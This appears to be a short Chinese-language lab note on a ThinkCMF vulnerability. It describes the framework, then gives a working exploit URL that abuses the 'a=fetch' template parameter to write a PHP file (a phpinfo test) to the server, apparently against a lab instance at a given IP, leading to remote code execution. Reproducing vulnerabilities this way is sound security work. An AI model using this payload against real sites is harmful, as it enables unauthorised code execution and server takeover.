1、ThinkCMF是一款基於PHP+MYSQL開發的中文內容管理框架。 攻擊者可利用此漏洞構造惡意的url,向伺服器寫入任意內容的檔案,達到遠端程式碼執行的目的。

一、ThinkCMF簡介

ThinkCMF是一款基於PHP+MYSQL開發的中文內容管理系統框架,底層採用ThinkPHP3.2.3構建。ThinkCMF提出靈活的應用機制，框架自身提供基礎的管理功能，而開發者可以根據自身的需求以應用的形式進行擴充套件。

每個應用都能獨立的完成自己的任務，也可通過系統呼叫其他應用進行協同工作。在這種執行機制下，開發商場應用的使用者無需關心開發SNS應用時如何工作的，但他們之間又可通過系統本身進行協調，大大的降低了開發成本和溝通成本。

一、通過構造a引數的fetch方法，實現任意檔案寫入，把php程式碼寫入檔案

http://123.58.236.76:13916/

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>

http://123.58.236.76:13916/test.php